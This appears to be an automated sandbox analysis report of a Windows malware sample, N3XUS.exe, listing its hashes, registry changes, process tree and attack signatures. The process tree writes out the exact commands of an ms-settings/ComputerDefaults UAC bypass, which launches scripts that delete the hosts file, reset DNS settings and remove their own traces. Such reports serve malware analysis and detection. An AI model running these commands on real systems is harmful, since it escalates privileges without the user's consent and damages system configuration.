Analysis
-
max time kernel
147s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21/11/2024, 09:56
Static task
static1
Behavioral task
behavioral1
Sample
N3XUS.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
N3XUS.exe
Resource
win10v2004-20241007-en
General
-
Target
N3XUS.exe
-
Size
255KB
-
MD5
a5c463cb69a24c37d962587706f4df4b
-
SHA1
634520f698c5ce7df3e51174fe64306b1b0f1bfe
-
SHA256
dcf5453a2be04f3ebe45d56e631a9cadb573b27de1ef142ecd958ba8560f0dd0
-
SHA512
92f61d162802401ae7473e235becd580419a57e1cfe99475166717d93de26e51ecbd60bbebbe0b9a6a8fe15bb1c42c9f31676cef37815f040a0c408108c04c2e
-
SSDEEP
3072:Sz2z1EWSnEvrSmD+l25mFdO4em5guIg+GtfDVVtTzKE:Sz2zBvrSmD/d4z5UlqDVvzKE
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation wscript.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Modifies registry class 33 IoCs
description ioc Process Key deleted \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open\command reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key deleted \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings reg.exe Key deleted \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings reg.exe Key deleted \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell reg.exe Key deleted \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open\command reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\9371.vbs" reg.exe Key deleted \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\8100.vbs" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key deleted \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings reg.exe Key deleted \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\2961.vbs" reg.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\ms-settings\Shell\Open\command reg.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2008 wrote to memory of 4652 2008 N3XUS.exe 88 PID 2008 wrote to memory of 4652 2008 N3XUS.exe 88 PID 4652 wrote to memory of 1564 4652 cmd.exe 90 PID 4652 wrote to memory of 1564 4652 cmd.exe 90 PID 2008 wrote to memory of 3788 2008 N3XUS.exe 91 PID 2008 wrote to memory of 3788 2008 N3XUS.exe 91 PID 3788 wrote to memory of 4092 3788 cmd.exe 93 PID 3788 wrote to memory of 4092 3788 cmd.exe 93 PID 3788 wrote to memory of 1844 3788 cmd.exe 94 PID 3788 wrote to memory of 1844 3788 cmd.exe 94 PID 2008 wrote to memory of 3796 2008 N3XUS.exe 95 PID 2008 wrote to memory of 3796 2008 N3XUS.exe 95 PID 3796 wrote to memory of 2812 3796 cmd.exe 97 PID 3796 wrote to memory of 2812 3796 cmd.exe 97 PID 2812 wrote to memory of 1360 2812 ComputerDefaults.exe 99 PID 2812 wrote to memory of 1360 2812 ComputerDefaults.exe 99 PID 1360 wrote to memory of 3416 1360 wscript.exe 101 PID 1360 wrote to memory of 3416 1360 wscript.exe 101 PID 2008 wrote to memory of 3176 2008 N3XUS.exe 103 PID 2008 wrote to memory of 3176 2008 N3XUS.exe 103 PID 2008 wrote to memory of 2012 2008 N3XUS.exe 105 PID 2008 wrote to memory of 2012 2008 N3XUS.exe 105 PID 2012 wrote to memory of 4484 2012 cmd.exe 107 PID 2012 wrote to memory of 4484 2012 cmd.exe 107 PID 2008 wrote to memory of 3784 2008 N3XUS.exe 111 PID 2008 wrote to memory of 3784 2008 N3XUS.exe 111 PID 3784 wrote to memory of 2816 3784 cmd.exe 113 PID 3784 wrote to memory of 2816 3784 cmd.exe 113 PID 2008 wrote to memory of 4048 2008 N3XUS.exe 114 PID 2008 wrote to memory of 4048 2008 N3XUS.exe 114 PID 4048 wrote to memory of 4776 4048 cmd.exe 116 PID 4048 wrote to memory of 4776 4048 cmd.exe 116 PID 4048 wrote to memory of 1020 4048 cmd.exe 117 PID 4048 wrote to memory of 1020 4048 cmd.exe 117 PID 2008 wrote to memory of 736 2008 N3XUS.exe 118 PID 2008 wrote to memory of 736 2008 N3XUS.exe 118 PID 736 wrote to memory of 100 736 cmd.exe 120 PID 736 wrote to memory of 100 736 cmd.exe 120 PID 100 wrote to memory of 1060 100 ComputerDefaults.exe 121 PID 100 wrote to memory of 1060 100 ComputerDefaults.exe 121 PID 1060 wrote to memory of 2028 1060 wscript.exe 122 PID 1060 wrote to memory of 2028 1060 wscript.exe 122 PID 2008 wrote to memory of 3076 2008 N3XUS.exe 124 PID 2008 wrote to memory of 3076 2008 N3XUS.exe 124 PID 2008 wrote to memory of 1796 2008 N3XUS.exe 126 PID 2008 wrote to memory of 1796 2008 N3XUS.exe 126 PID 1796 wrote to memory of 1100 1796 cmd.exe 128 PID 1796 wrote to memory of 1100 1796 cmd.exe 128 PID 2008 wrote to memory of 4084 2008 N3XUS.exe 129 PID 2008 wrote to memory of 4084 2008 N3XUS.exe 129 PID 4084 wrote to memory of 3888 4084 cmd.exe 131 PID 4084 wrote to memory of 3888 4084 cmd.exe 131 PID 2008 wrote to memory of 2356 2008 N3XUS.exe 132 PID 2008 wrote to memory of 2356 2008 N3XUS.exe 132 PID 2356 wrote to memory of 1576 2356 cmd.exe 134 PID 2356 wrote to memory of 1576 2356 cmd.exe 134 PID 2356 wrote to memory of 4404 2356 cmd.exe 135 PID 2356 wrote to memory of 4404 2356 cmd.exe 135 PID 2008 wrote to memory of 4384 2008 N3XUS.exe 136 PID 2008 wrote to memory of 4384 2008 N3XUS.exe 136 PID 4384 wrote to memory of 1736 4384 cmd.exe 138 PID 4384 wrote to memory of 1736 4384 cmd.exe 138 PID 1736 wrote to memory of 4016 1736 ComputerDefaults.exe 139 PID 1736 wrote to memory of 4016 1736 ComputerDefaults.exe 139
Processes
-
C:\Users\Admin\AppData\Local\Temp\N3XUS.exe"C:\Users\Admin\AppData\Local\Temp\N3XUS.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4652 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f3⤵PID:1564
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\9371.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3788 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\9371.vbs" /f3⤵
- Modifies registry class
PID:4092
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f3⤵
- Modifies registry class
PID:1844
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3796 -
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe3⤵
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\9371.vbs4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1360 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts5⤵PID:3416
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\9371.vbs2⤵PID:3176
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f3⤵
- Modifies registry class
PID:4484
-
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3784 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f3⤵PID:2816
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\8100.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4048 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\8100.vbs" /f3⤵
- Modifies registry class
PID:4776
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f3⤵
- Modifies registry class
PID:1020
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe2⤵
- Suspicious use of WriteProcessMemory
PID:736 -
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe3⤵
- Suspicious use of WriteProcessMemory
PID:100 -
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\8100.vbs4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" interface ip set dns "Wi-Fi" dhcp5⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2028
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\8100.vbs2⤵PID:3076
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f3⤵
- Modifies registry class
PID:1100
-
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4084 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f3⤵PID:3888
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\2961.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\2961.vbs" /f3⤵
- Modifies registry class
PID:1576
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f3⤵
- Modifies registry class
PID:4404
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe3⤵
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\2961.vbs4⤵
- Checks computer location settings
PID:4016 -
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" interface ip set dns "Ethernet" dhcp5⤵
- Event Triggered Execution: Netsh Helper DLL
PID:404
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\2961.vbs2⤵PID:4908
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f2⤵PID:3628
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f3⤵
- Modifies registry class
PID:3656
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
117B
MD5bb8cfb89bce8af7384447115a115fb23
SHA16a0e728f4953128db9db52474ae5608ecee9c9c3
SHA256d812291a41eddd5eac04972e66feffc44c1ee2c249d708bb282144823a6e8485
SHA512d69901ba3cebd1fe8ed8e3d613e16a6cfbead827a9493a7edd8c62fb2915a550450ff4f47f00a8c66880ea10cd4029bceac4518d1951c19fb7ad9d7505007553
-
Filesize
114B
MD534b33b5a437e20d03d79b62a797dfe99
SHA19b57b598a7e9d66157a05a44bc7c097bf5486e6c
SHA256f920f526773c0565072fcfd250319c9dd53b9197d448b9d29307598e0fa004e1
SHA512757be8161af2eb4af36772e2e0d912e0967540cb42ef6ef8cd85f28edb478756c99d9e7a6fef04b16e6bf63a3dc9ddb9c2adf490e8d9ae2ca0e3e9b76ef6fa6c
-
Filesize
125B
MD58b4ed5c47fdddbeba260ef11cfca88c6
SHA1868f11f8ed78ebe871f9da182d053f349834b017
SHA256170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5
SHA51287e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf